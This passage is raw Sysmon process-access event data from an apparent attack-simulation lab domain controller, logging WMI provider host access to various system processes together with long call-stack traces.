Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007947Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007946Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007945Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007944Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007943Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007942Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007941Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007940Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007939Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007938Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007937Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007936Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007935Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007934Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007933Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000007932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:56:45.142{10ACEC4A-8552-5FCF-4900-000000009101}39282800C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+